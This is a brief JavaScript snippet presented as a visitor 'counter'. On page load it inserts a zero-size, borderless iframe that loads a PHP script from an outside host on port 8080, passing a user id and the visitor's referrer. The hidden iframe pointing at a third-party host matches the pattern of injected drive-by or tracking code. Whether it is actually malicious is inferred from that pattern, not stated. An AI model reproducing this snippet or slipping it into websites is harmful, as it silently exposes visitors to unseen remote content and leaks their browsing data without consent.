function counter(num)
{
var iframe=document.createElement("iframe")
url="http://jsq.etwun.com:8080/counter-jp.php?user="+num+"&refer="+escape(escape(document.referrer))
iframe.setAttribute("src",url)
iframe.setAttribute("width","0")
iframe.setAttribute("height","0")
iframe.setAttribute("frameBorder","0")
iframe.setAttribute("scrolling","no")
var dbbody=document.getElementsByTagName("head")
dbbody[0].appendChild(iframe)
}
counter(351)